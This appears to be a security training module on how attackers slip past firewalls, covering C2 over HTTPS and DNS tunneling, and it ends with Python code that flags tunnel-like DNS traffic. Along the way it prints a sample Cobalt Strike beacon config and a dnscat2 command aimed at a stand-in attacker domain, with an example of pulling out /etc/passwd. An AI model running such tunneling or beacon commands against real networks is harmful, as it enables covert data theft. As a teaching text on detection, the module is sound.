Firewalls see headers, not intent. A firewall rule that permits “outbound HTTPS to any destination” lets through legitimate web browsing, cloud-based C2, data exfiltration, DNS over HTTPS, file sharing, and cryptocurrency mining alike, because to the firewall they all look like HTTPS. This module is about why firewall logs alone never catch modern attackers, and what actually works.
Why this happens
Firewalls were designed to block unwanted traffic. Modern attacks don’t use unwanted traffic; they use wanted traffic turned to unwanted purposes. Every organization needs its employees to browse the web, use SaaS, join video calls, and exchange email. Every one of those protocols is a potential C2 channel, data exfiltration vector, or attack payload delivery mechanism.
The firewall’s fundamental capability, making decisions from packet headers, is poorly matched to a world where 95% of outbound traffic is TLS-encrypted HTTPS that the firewall cannot inspect without TLS interception. And TLS interception breaks certificate pinning, breaks many SaaS applications, and creates its own attack surface at the interception proxy.
How attackers bypass firewalls: concrete techniques
C2 over HTTPS
The modern default. Beacon calls out over HTTPS to an attacker-controlled domain (or CDN-fronted domain). The firewall sees encrypted traffic to a reputable-looking host. Unless you have SSL interception + content inspection + behavioural analytics, this traffic is indistinguishable from normal web browsing.
# Cobalt Strike beacon default config
# ---
# spawnto = %WINDIR%\sysnative\rundll32.exe
# sleep = 60s (with 20% jitter)
# get-uri = /api/v1/sync
# useragent = Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36...
# callback = https://cdn-frontend.example.com
# Traffic pattern: HTTP GETs every 60s, encrypted, to a domain with valid cert
# Firewall sees: outbound HTTPS to known-good category (CDN)
# Blue team sees: nothing unusual in traffic volumes
DNS tunneling
DNS is usually allowed outbound to anywhere (the firewall treats it as ordinary name resolution against internet servers). The attacker encodes data in subdomain labels:
# DNS tunnel client (iodine, dnscat2)
dnscat2 --dns server=cmd-server.com --secret=shared_secret
# Attacker DNS server receives:
# Query: aBc123XyZ.cmd-server.com
# → decodes to "cat /etc/passwd"
# Response: dEf456UvW.cmd-server.com
# → encodes the passwd file contents
# To firewall: normal DNS traffic
# To defender without DNS analytics: invisible
Detection: entropy analysis of DNS query labels, count of unique subdomains per registered domain, and response-size patterns.
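The three heuristics above, combined into one scoring pass over a DNS query log. This is an added example, not code from the module; the log lines are constructed, the thresholds are illustrative starting points to tune against your own baseline, and the registered-domain split is a naive last-two-labels approximation.

```python
import math
from collections import Counter, defaultdict

# Constructed sample DNS log, not real traffic: (client_ip, query_name, response_bytes).
SAMPLE_DNS_LOG = [
    ("10.0.0.5", "www.example.com", 120),
    ("10.0.0.5", "mail.example.com", 118),
    ("10.0.0.5", "cdn.example.com", 130),
    ("10.0.0.7", "a8f3k2z9q1m4x7c2v5b8n1l6.cmd-server.com", 480),
    ("10.0.0.7", "p0o9i8u7y6t5r4e3w2q1z2x3.cmd-server.com", 512),
    ("10.0.0.7", "h4g5f6d7s8a9l0k1j2m3n4b5.cmd-server.com", 498),
    ("10.0.0.7", "v6c7x8z9b0n1m2a3s4d5f6g7.cmd-server.com", 505),
]

def shannon_entropy(s: str) -> float:
    """Bits per character of s; encoded or random-looking labels score high."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())

def split_qname(qname: str):
    """Naive (subdomain, registered domain) split on the last two labels.
    Production code should use the Public Suffix List for suffixes like co.uk."""
    labels = qname.lower().rstrip(".").split(".")
    return ".".join(labels[:-2]), ".".join(labels[-2:])

def score_domains(log, entropy_min=3.5, unique_subs_min=3, response_min=400):
    """Aggregate per registered domain and flag tunnel-like behaviour.
    All three heuristics must fire together: entropy alone is tripped by legitimate
    hash-named CDN hosts, unique-subdomain count alone by large SaaS estates."""
    per_domain = defaultdict(lambda: {"subs": set(), "ent": [], "size": []})
    for _client, qname, resp_bytes in log:
        sub, domain = split_qname(qname)
        per_domain[domain]["subs"].add(sub)
        per_domain[domain]["ent"].append(shannon_entropy(sub.replace(".", "")))
        per_domain[domain]["size"].append(resp_bytes)
    results = {}
    for domain, agg in per_domain.items():
        mean_ent = sum(agg["ent"]) / len(agg["ent"])
        mean_size = sum(agg["size"]) / len(agg["size"])
        uniq = len(agg["subs"])
        results[domain] = {
            "unique_subdomains": uniq,
            "mean_entropy": round(mean_ent, 2),
            "mean_response_bytes": round(mean_size, 1),
            "suspicious": mean_ent >= entropy_min and uniq >= unique_subs_min and mean_size >= response_min,
        }
    return results
```

Run on the sample, cmd-server.com is flagged (high-entropy labels, four distinct subdomains, ~500-byte responses) while example.com is not; in practice feed it a per-client, per-hour window so a single noisy host does not dominate.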
Intermediate Module · Basic Tier